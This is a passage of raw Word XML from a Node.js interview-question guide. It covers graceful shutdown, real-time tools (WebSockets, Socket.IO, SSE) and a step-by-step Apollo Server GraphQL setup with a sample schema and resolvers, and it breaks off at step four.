          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Logging and Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement logging and use monitoring tools to track and manage errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8F880C" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Graceful Shutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure proper cleanup and graceful shutdown of your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E62C16A" w14:textId="77777777" w:rsidR="00E52823" w:rsidRPr="00DA2F32" w:rsidRDefault="00E52823" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F0CED50"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50" w:name="_Toc178383233"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q48. How can Node.js be used to create real-time applications, such as chat applications or real-time dashboards?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="5E251C04" w14:textId="77777777" w:rsidR="00B556C9" w:rsidRPr="00DA2F32" w:rsidRDefault="00B556C9" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>WebSockets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B0B2D9" w14:textId="77777777" w:rsidR="00B556C9" w:rsidRPr="00DA2F32" w:rsidRDefault="00B556C9" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>WebSockets</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> enable full-duplex communication channels over a single TCP connection. They are ideal for real-time applications because they allow for bi-directional communication between the server and clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CA102A" w14:textId="77777777" w:rsidR="00B556C9" w:rsidRPr="00DA2F32" w:rsidRDefault="00B556C9" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Library</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: ws or Socket.IO are popular libraries for implementing WebSocket communication in Node.js.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DAF339" w14:textId="77777777" w:rsidR="00B556C9" w:rsidRPr="00DA2F32" w:rsidRDefault="00B556C9" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Socket.IO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B1B4FD" w14:textId="77777777" w:rsidR="00B556C9" w:rsidRPr="00DA2F32" w:rsidRDefault="00B556C9" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Socket.IO</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a library that provides real-time, bidirectional communication between web clients and servers. It abstracts WebSockets and offers additional features like automatic reconnections and support for older browsers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69791B3C" w14:textId="77777777" w:rsidR="00B556C9" w:rsidRPr="00DA2F32" w:rsidRDefault="00B556C9" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event Emitters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6616B804" w14:textId="77777777" w:rsidR="00B556C9" w:rsidRPr="00DA2F32" w:rsidRDefault="00B556C9" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event Emitters</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Node.js allow you to handle events and perform actions in response to those events. They are useful for managing and triggering real-time events within your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109E6EE3" w14:textId="77777777" w:rsidR="00B556C9" w:rsidRPr="00DA2F32" w:rsidRDefault="00B556C9" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Server-Sent Events (SSE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2910B07D" w14:textId="77777777" w:rsidR="00B556C9" w:rsidRPr="00DA2F32" w:rsidRDefault="00B556C9" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SSE</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows servers to push updates to clients over an HTTP connection. It's simpler than WebSockets for certain use cases but only supports unidirectional communication from server to client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329DB5A2" w14:textId="77777777" w:rsidR="00B556C9" w:rsidRPr="00DA2F32" w:rsidRDefault="00B556C9" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DF8EEB3"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51" w:name="_Toc178383234"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q49. What is GraphQL, and how can it be used with Node.js to build APIs?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="18162D7C"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a query language for APIs and a runtime for executing those queries with your existing data. It provides a more flexible and efficient way to interact with APIs compared to traditional RESTful APIs. With GraphQL, clients can request exactly the data they need, and nothing more, which can help optimize performance and reduce the amount of data transferred over the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DBAD5D" w14:textId="77777777" w:rsidR="0005308B" w:rsidRPr="00DA2F32" w:rsidRDefault="0005308B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Concepts of GraphQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77968EEA" w14:textId="77777777" w:rsidR="0005308B" w:rsidRPr="00DA2F32" w:rsidRDefault="0005308B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Define what data you want to fetch from the server. Clients can request multiple resources in a single query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F5A7CF" w14:textId="77777777" w:rsidR="0005308B" w:rsidRPr="00DA2F32" w:rsidRDefault="0005308B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Mutations</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Define operations that modify server-side data (e.g., creating, updating, or deleting resources).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C339355" w14:textId="77777777" w:rsidR="0005308B" w:rsidRPr="00DA2F32" w:rsidRDefault="0005308B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Subscriptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Allow clients to subscribe to real-time updates from the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A7E346" w14:textId="77777777" w:rsidR="0005308B" w:rsidRPr="00DA2F32" w:rsidRDefault="0005308B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Schema</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Defines the structure of the GraphQL API, including types, queries, and mutations. The schema is a contract between the client and server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C69B2B" w14:textId="77777777" w:rsidR="0005308B" w:rsidRPr="00DA2F32" w:rsidRDefault="0005308B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Resolvers</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Functions that resolve the data for each field in the schema. They fetch and return data based on the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3B96F0" w14:textId="77777777" w:rsidR="0005308B" w:rsidRPr="00DA2F32" w:rsidRDefault="0005308B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Using GraphQL with Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1A641E"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rPr>
        <w:t>To build a GraphQL API with Node.js, you typically use a GraphQL server library such as Apollo Server, Express-GraphQL, or graphql-yoga. Here’s a step-by-step guide to getting started with Apollo Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427FBCEC" w14:textId="77777777" w:rsidR="0005308B" w:rsidRPr="00DA2F32" w:rsidRDefault="0005308B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Install Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397F8466"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rPr>
        <w:t>First, you need to install the necessary packages. Create a new Node.js project if you don’t have one already.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE617B4"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mkdir my-graphql-api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C281FC5"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cd my-graphql-api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A579811"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npm init -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D71934D"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npm install apollo-server graphql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792CC39E" w14:textId="77777777" w:rsidR="0005308B" w:rsidRPr="00DA2F32" w:rsidRDefault="0005308B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Set Up Your Schema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45596BA6"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rPr>
        <w:t>Define the GraphQL schema. Create a file named schema.js or schema.ts if you’re using TypeScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BBA2DE"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schema.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6400F3"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const { gql } = require('apollo-server');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69857677"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401EADBD"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typeDefs = gql`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FC04D2"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type Query {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2651F256"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hello: String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CAA56F"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users: [User]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69396525"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9EA23C4"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066B028E"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type User {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524DA7B9"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id: ID!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08284F82"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0D7EE5E7"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email: String!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584680D2"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3C8D115"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A09CF78"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type Mutation {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15691B51"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addUser(name: String!, email: String!): User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C49BB67"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3A75B79"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66D10F1"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112FBB2E"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highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>module.exports = { typeDefs };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2C8E14" w14:textId="77777777" w:rsidR="0005308B" w:rsidRPr="00DA2F32" w:rsidRDefault="0005308B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. Implement Resolvers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B538237"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rPr>
        <w:t>Resolvers are responsible for fetching and returning the data requested by the queries and mutations. Create a file named resolvers.js.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6D36C5"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resolvers.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADAC7FC"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users = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5636CCA9"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0F565F7E"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resolvers = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9A0E0E"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Query: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541A3282"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hello: () =&gt; 'Hello, world!',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C109626"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users: () =&gt; users,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735CD903"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BFE448C"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Mutation: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74987D75"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addUser: (_, { name, email }) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1911E01A"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user = { id: users.length + 1, name, email };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCEFCD1"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users.push(user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C5C0AE"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user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057DBC7D"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3B4C2C1"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8A03A90"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5F34EA1"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highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="621C1F53" w14:textId="77777777" w:rsidR="0005308B" w:rsidRPr="00DA2F32" w:rsidRDefault="0005308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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>module.exports = { resolvers };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEA8CC4" w14:textId="77777777" w:rsidR="0005308B" w:rsidRPr="00DA2F32" w:rsidRDefault="0005308B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4. Set Up Apollo Server</w:t>
